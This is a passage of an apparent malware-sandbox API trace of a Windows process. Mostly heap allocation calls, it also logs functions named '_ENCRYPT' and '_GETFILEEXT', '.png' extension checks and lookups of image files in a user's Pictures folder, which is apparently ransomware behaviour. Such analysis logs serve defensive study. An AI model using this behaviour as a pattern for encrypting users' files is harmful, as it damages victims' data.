Size=0x10) returned 0x9bd4b0 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.670] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.671] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0189.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0189.672] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.673] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.674] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0189.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.674] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.674] CloseHandle (hObject=0x158) returned 1 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.675] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.675] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.676] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.676] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.676] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.676] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x13eacf50, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 0x90add8 [0189.676] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x13eacf50, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 0x90add8 [0189.677] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", 